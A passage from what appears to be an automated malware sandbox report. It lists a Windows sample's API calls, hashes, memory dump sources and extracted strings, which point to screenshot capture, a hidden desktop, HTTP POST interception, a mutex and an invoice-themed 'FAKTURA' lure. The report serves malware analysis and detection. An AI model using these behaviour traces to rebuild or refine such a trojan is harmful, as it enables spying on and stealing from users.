                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E313B319442185BCB60DB789C48BEABBE9FF55740F5489D9E6C6D3100DFB0D984CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C10,76F93050,76F930D0,76F93080), ref: 02BC50B7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC50BA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC50CE
                                                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 02BC50F5
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BC5113
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC511D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC5120
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC512D
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC5130
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02BC5148
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC514F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC515F
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BC5175
                                                                                                                                                                                                            • htons.WS2_32(00000000), ref: 02BC51A1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02BC51D1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC51D4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02BC51E4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC51E7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1718479325-0
                                                                                                                                                                                                            • Opcode ID: 7fbbbcc82e655ac9a0f5af17e6bf3b9d1fa1f05d285992afc5f7f6fe9c144567
                                                                                                                                                                                                            • Instruction ID: 6e514c3344c575edd749ffb42520ed2c35e8343a5d71cc48deea61e86315ee8d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fbbbcc82e655ac9a0f5af17e6bf3b9d1fa1f05d285992afc5f7f6fe9c144567
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9441C372A40304ABDB309F65DC4CF9E7B68EF44790FA58658FA45A7280DB71E580CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC5250
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC527C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,0000001C,0000001C), ref: 02BC52A3
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000005), ref: 02BC52D4
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC52FD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02BC5315
                                                                                                                                                                                                            • StrToIntA.SHLWAPI(-00000010), ref: 02BC5323
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC5355
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                            • String ID: $Content-Length: $POST
                                                                                                                                                                                                            • API String ID: 2509092961-2076583852
                                                                                                                                                                                                            • Opcode ID: e7972b1d942e5c31f1ab25a471a792741f0cbfed0ee84b78b5b9b20dcb130159
                                                                                                                                                                                                            • Instruction ID: 2093565485bbcdd62a37dcd30fffe1f093fe504661ac3e54558abb05b9390df4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7972b1d942e5c31f1ab25a471a792741f0cbfed0ee84b78b5b9b20dcb130159
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C717F71D40309AFDB20CFA8D884BAEBBF5FB48704B58866DE606E7244D770A905CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC3821
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC383C
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,76F90F00,00000000,00000000), ref: 02BC3856
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,76F90F00,00000000,00000000), ref: 02BC386C
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegQueryValueExA.KERNEL32(?,698896B4a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC38BB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC38C2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC38CE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC38D5
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,76F90F00), ref: 02BC394D
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,?,?,76F90F00,00000000,00000000), ref: 02BC395A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC3998
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC399B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC39A7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC39AA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: /topic.php
                                                                                                                                                                                                            • API String ID: 870369024-224703247
                                                                                                                                                                                                            • Opcode ID: 368674dc9ac388132e059820135351534e13c1b80728acdff01b13f15dfa5999
                                                                                                                                                                                                            • Instruction ID: 26365d6943e4f01155cc054d040b91784f609f369db0af8e6a5ed619f49a38f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368674dc9ac388132e059820135351534e13c1b80728acdff01b13f15dfa5999
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 365117B29441186BCB349B749C88EEBBBBCEB44300F9489DDF756D7140D7B19D848BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BB833C
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,?,?,02BB8212,00000000,00000000), ref: 02BB8343
                                                                                                                                                                                                            • SetThreadDesktop.USER32(00000000,?,?,02BB8212,00000000,00000000), ref: 02BB834F
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: GetTickCount.KERNEL32 ref: 02BBDA2D
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02BBDA3E
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02BFF5A0), ref: 02BBDA6A
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDA83
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BBDAB0
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDAC3
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: CreateMutexA.KERNEL32(00000000,00000000,02BFF670), ref: 02BBDAE1
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BBDAFF
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02BBDB20
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: SetNamedSecurityInfoA.ADVAPI32(02BFF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDB3D
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: LocalFree.KERNEL32(00000000), ref: 02BBDB47
                                                                                                                                                                                                              • Part of subcall function 02BBDC50: memset.MSVCRT ref: 02BBDC69
                                                                                                                                                                                                              • Part of subcall function 02BBDC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02BBDC82
                                                                                                                                                                                                              • Part of subcall function 02BD9F50: malloc.MSVCRT ref: 02BD9F62
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02BB83E7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02BB83F5
                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,fuck), ref: 02BB83FF
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02BC4FE7
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02BC5045
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02BB84A2
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02BB84B1
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02BB84E0
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB84EF
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB84FD
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02BB8506
                                                                                                                                                                                                            • Sleep.KERNEL32(00002710,?,00000000), ref: 02BB854C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$AdminAliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickUserVersionlstrcpymalloc
                                                                                                                                                                                                            • String ID: SYSTEM!899552!F2AA6EC3$fuck
                                                                                                                                                                                                            • API String ID: 379441473-274505873
                                                                                                                                                                                                            • Opcode ID: e53eb069a7a082009e30a4626ed9f4b359bad726e661ad0a455c023ffe9c75a1
                                                                                                                                                                                                            • Instruction ID: 9200360f6d42992ab1240cb64c26fc71e4e4743ce43689578d6a31305b38b746
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e53eb069a7a082009e30a4626ed9f4b359bad726e661ad0a455c023ffe9c75a1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6051B2759403419FD7619F68D888FF63BE9EF44354F094AE9E6584B2A2C7B0E814CF60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CD8C), ref: 02BD23B7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD23F9
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD2405
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2409
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD241A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD2421
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD2452
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD2458
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD245C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD246D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD2474
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD24A2
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BD24B8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 224938940-1670482240
                                                                                                                                                                                                            • Opcode ID: dfacdbbcc2eccd2ea160e27d87f067054c2f8a7842d6c73f2420494752e6cdc1
                                                                                                                                                                                                            • Instruction ID: 039b84eca5393c7aaa50577c57f38712708685db3ee5709faa95087eac17814f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfacdbbcc2eccd2ea160e27d87f067054c2f8a7842d6c73f2420494752e6cdc1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 163138319442595BDB60DB789C58BEABBE8EF55740F8884D4EEC5D3101EBB0E984CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CA80), ref: 02BD1347
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD1389
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD1395
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD1399
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD13AA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD13B1
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD13E2
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD13E8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD13EC
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD13FD
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD1404
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD1432
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BD1448
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 224938940-1670482240
                                                                                                                                                                                                            • Opcode ID: 4707df7decdf4dfd182ea2edda2a6c30bd76c0bf00f63c2df79c78406db0fd36
                                                                                                                                                                                                            • Instruction ID: 5ca896b11fe54b8ab98e8da4e254acc1cd6c460cbf46334fcef58177eadb7f82
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4707df7decdf4dfd182ea2edda2a6c30bd76c0bf00f63c2df79c78406db0fd36
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15312C319442195BDB60DB7D9C58BEABBE8EF55750F8884D4EA89D3100EB70E984CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CF94), ref: 02BD3367
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD33A9
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD33B5
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD33B9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD33CA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD33D1
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3402
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD3408
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD340C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD341D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD3424
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD3452
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BD3468
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 224938940-1670482240
                                                                                                                                                                                                            • Opcode ID: c15e5511e859401d25e6631d175e4b2da8747cc5d67360cb9e334550117e9a99
                                                                                                                                                                                                            • Instruction ID: b5a1ed7bc9656a71c23918afc14a0d9986feb95407b449470bb09fea83ea2b8d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c15e5511e859401d25e6631d175e4b2da8747cc5d67360cb9e334550117e9a99
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E314C319442185BCB60DB789C58BEABBE8EF55750F8884D4EAC5D3101EFB0E984CFA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD30A7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD30E9
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD30F5
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD30F9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD310A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD3111
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3142
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD3148
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD314C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD315D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD3164
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD3192
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BD31A8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 224938940-1670482240
                                                                                                                                                                                                            • Opcode ID: d2e37bfec8bb2865c3cc942a4fee4a0bbfe2d655ddaa19dba9c7fcd3b1802831
                                                                                                                                                                                                            • Instruction ID: c7de85fa62b177ae635585667fc570b96f4bf437418619f4dfdcad7e4658cb19
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2e37bfec8bb2865c3cc942a4fee4a0bbfe2d655ddaa19dba9c7fcd3b1802831
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F316931D402195BCB60CB789C58BEABBE8EF55740F8848D4EA85D3101EBB0E9C4CFA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02BCF6BC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCF6D2
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02BCF6E0
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCF6E9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BCF707
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCF715
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCF2D0,00000000,00000000,00000000), ref: 02BCF72A
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02BCF73B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCF740
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BCF754
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCF762
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670), ref: 02BCF76D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C670,FAKTURA), ref: 02BCF787
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
                                                                                                                                                                                                            • API String ID: 2736094147-4104618384
                                                                                                                                                                                                            • Opcode ID: 3642cebb1361988ef6ae30c9e7b15459d497649247ef3b7aeb694b604cb9991c
                                                                                                                                                                                                            • Instruction ID: 35b964b49a0cb5f1a467eff86816a43557f6a8c7bead5e80d87f1421fe43ad4d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3642cebb1361988ef6ae30c9e7b15459d497649247ef3b7aeb694b604cb9991c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1212931AC53113AF230AB689C06F6E73999F04B61F60879AFB84671C08BB0A4008BB5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02BBA25E
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindowLongA.USER32(02BBCE3A,000000F0), ref: 02BBE26B
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetLastActivePopup.USER32(02BBCE3A), ref: 02BBE279
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000005), ref: 02BBE293
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindow.USER32(00000000), ref: 02BBE296
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindowInfo.USER32(00000000,?), ref: 02BBE2AC
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000004), ref: 02BBE2B5
